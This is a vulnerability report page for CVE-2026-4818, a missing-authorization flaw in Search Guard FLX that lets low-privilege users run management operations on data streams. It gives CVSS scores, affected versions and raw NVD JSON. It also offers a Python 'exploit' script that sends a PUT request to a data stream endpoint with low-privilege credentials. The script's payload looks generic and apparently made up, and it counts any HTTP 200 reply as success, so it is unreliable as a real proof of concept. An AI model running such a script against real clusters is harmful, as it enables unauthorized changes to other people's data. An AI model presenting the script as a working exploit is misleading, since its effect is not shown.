Security Vulnerability Report
中文
CVE-2026-4818 CVSS 6.8 MEDIUM

CVE-2026-4818

Published: 2026-03-31 16:16:35
Last Modified: 2026-04-03 13:56:53
Source: [email protected]

Description

In Search Guard FLX versions from 3.0.0 up to 4.0.1, there exists an issue which allows users without the necessary privileges to execute some management operations against data streams.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:search-guard:flx:*:*:*:*:*:*:*:* - VULNERABLE
Search Guard FLX >= 3.0.0, <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL (Replace with actual target) target_url = "https://<search-guard-host>:9200/_data_streams/<stream-name>" # Low privilege user credentials username = "low_priv_user" password = "password123" # The vulnerability allows creating/managing data streams without proper authorization headers = { "Content-Type": "application/json" } # Payload to create or modify a data stream (Management Operation) payload = { "match": "*" } try: # Sending request with low privilege credentials response = requests.put(target_url, auth=(username, password), headers=headers, data=json.dumps(payload), verify=False) if response.status_code == 200: print("[+] Exploit successful! Management operation executed.") print("Response:", response.text) else: print("[-] Exploit failed or patched.") print("Status Code:", response.status_code) print("Response:", response.text) except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4818", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:34.580", "lastModified": "2026-04-03T13:56:52.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Search Guard FLX versions from 3.0.0 up to 4.0.1, there exists an issue which allows users without the necessary privileges to execute some management operations against data streams."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:search-guard:flx:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "4.1.0", "matchCriteriaId": "0EB4FA3B-8F81-4678-AA9B-8CEFA348E652"}]}]}], "references": [{"url": "https://docs.search-guard.com/latest/changelog-searchguard-flx-4_1_0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://search-guard.com/cve-advisory/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.